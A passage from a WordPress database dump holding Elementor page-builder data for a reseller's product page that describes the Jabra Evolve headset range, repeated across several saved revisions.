platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65t<\\/h3><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3896bef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\",\"id\":2852}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9de26d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\",\"id\":2853}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 80<\\/h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 75e<\\/h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"814dc95\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\",\"id\":2854}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c93a2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\",\"id\":2855}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"ng-binding ng-scope\\\">Jabra Evolve 75<\\/h3><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65 Stereo \\/ Mono<\\/h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9efebba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\",\"id\":2856}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7bf8c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\",\"id\":2857}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 40 Stereo \\/ Mono<\\/h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 30 Stereo \\/ Mono<\\/h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"17446c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_30_.png\",\"id\":2858}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"81e8a0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\",\"id\":2859}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 Stereo \\/ Mono<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5049,2861,'_elementor_version','0.4'),(5174,2884,'_edit_lock','1550047293:1'),(5175,2884,'_edit_last','1'),(5052,2862,'_edit_lock','1549613401:1'),(5053,2862,'_edit_last','1'),(5054,2862,'_wp_page_template','template-fullwidth.php'),(5055,2862,'_hide_page_title',''),(5056,2862,'_hide_header',''),(5057,2862,'_hide_footer',''),(5058,2862,'_hide_breadcrumb',''),(5059,2862,'_cover',''),(5060,2862,'_show_excerpt',''),(5061,2862,'_wc_apply_product',''),(5062,2862,'_yoast_wpseo_content_score','90'),(5063,2865,'_wp_page_template','template-fullwidth.php'),(5064,2865,'_elementor_edit_mode','builder'),(5065,2865,'_elementor_template_type','post'),(5066,2865,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra.<\\/h2><h3>Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65t<\\/h3><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3896bef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\",\"id\":2852}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9de26d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\",\"id\":2853}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 80<\\/h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 75e<\\/h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"814dc95\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\",\"id\":2854}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c93a2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\",\"id\":2855}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"ng-binding ng-scope\\\">Jabra Evolve 75<\\/h3><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65 Stereo \\/ Mono<\\/h3><p>Engineered to multi-task, Evolve 65 is a wireless headset ideal for professionals who move around the office, but need to avoid interruptions. Connects to two Bluetooth products, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f0731e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9efebba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_65.png\",\"id\":2856}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"815f5e9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5a46717\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7bf8c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/752b1c6ecb4d653451bc19b4b566a870ae6bd94f_00_Evolve_40.png\",\"id\":2857}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910e26f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5e871e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 40 Stereo \\/ Mono<\\/h3><p>Engineered to boost productivity, Evolve 40 is a corded headset for professionals who take calls at the desk and need to avoid interruptions. Connects using USB or jack, includes an integrated busylight, and is certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 30 Stereo \\/ Mono<\\/h3><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"17446c1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_30_.png\",\"id\":2858}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"81e8a0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\",\"id\":2859}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 20 Stereo \\/ Mono<\\/h3><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5067,2865,'_elementor_version','0.4'),(6293,3066,'_elementor_edit_mode','builder'),(6292,3066,'_wp_page_template','template-fullwidth.php'),(8322,3620,'_elementor_template_type','post'),(5087,2868,'_elementor_template_type','post'),(5088,2868,'_elementor_data','[{\"id\":\"9b05eed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e3e83dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"272a30b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra.<\\/h2><h3>Sound that\\u2019s engineered for you<\\/h3><p>We engineer true wireless earbuds offering you total freedom noise-cancelling headsets allowing you to block out unwanted background sound; high definition headsets letting those you\\u2019re speaking to hear you with crystal-clear clarity and state-of-the-art fitness tracking sports headphones that aid you in beating your personal best. Each product helps you hear more, do more, and be more.<\\/p><p>With Jabra, you know that you are getting the best products on the market. They are engineered to be so.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba72cc4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c728c08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"63d6963\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>Jabra Evolve Series<\\/h2><h3>Engineered to be the best professional headsets to enhance productivity in the open office<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"828f173\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1f337bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9a63143\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve.jpg\",\"id\":2851},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05c6f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5625496\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Better concentration, greater productivity<\\/h3><p>The Jabra Evolve Series is a professional range of headsets offering best-in-class noise cancellation to aid concentration in open office environments.<\\/p><ul><li>World-class speakers to deliver amazing sound for calls and music.<\\/li><li>Call-management features allow for incredible ease-of-use..<\\/li><li>Compatible with all leading UC platforms.<\\/li><\\/ul>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"41e7d34\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"01d0215\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"40f3597\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 65t<\\/h3><p>The Jabra Evolve 65t are the world\\u2019s first UC-certified, true wireless earbuds. Features include Bluetooth 5.0, Passive Noise Cancellation, long battery life (up to 15 hours), and multiple EarGels\\u2122 for a personalized, secure fit. Enjoy crystal-clear sound quality and rock-solid call and music connection.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e503076\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3896bef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/JabraEvolve65t_ProductImage.png\",\"id\":2852}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"716ef9e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e8ecb8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9de26d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_80.png\",\"id\":2853}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2ea5436\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"242de0e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 80<\\/h3><p>Engineered for concentration, Evolve 80 is a corded premium headset for professionals who need to avoid disruptive noise. Superior Active and Passive Noise Cancellation provide crystal-clear calls. All-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f4bed1d\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"07d43f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c84f84f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 75e<\\/h3><p>Engineered for professional sound in comfortable, wireless earbuds, Evolve 75e is for those who need Skype for Business and Active Noise Cancellation \\u2013 but in an around-the-neck design. A host of professional features found in the Jabra Evolve Series, combined with up to 14 hours of battery for calls and music.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de05f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"814dc95\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Evolve75e.png\",\"id\":2854}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e653f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ab57536\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c93a2ba\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/954a74d741e4aeb8f7a9bd04d9dd2b0643c89424_00_Evolve_75.png\",\"id\":2855}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8392c16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d1ec16d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 class=\\\"ng-binding ng-scope\\\">Jabra Evolve 75<\\/h3><p class=\\\"ng-binding ng-scope\\\">Engineered for concentration in the office, Evolve 75 is a wireless premium headset for professionals who want to avoid disruptive noise \\u2013 and need mobility around the workspace. Move up to 100ft\\/30m away from your connected device, all-day comfort, an integrated busylight, and certified for Skype for Business, Cisco, and more.<\\/p><p><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e4c0a5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0d8290d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"97dea23\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Jabra Evolve 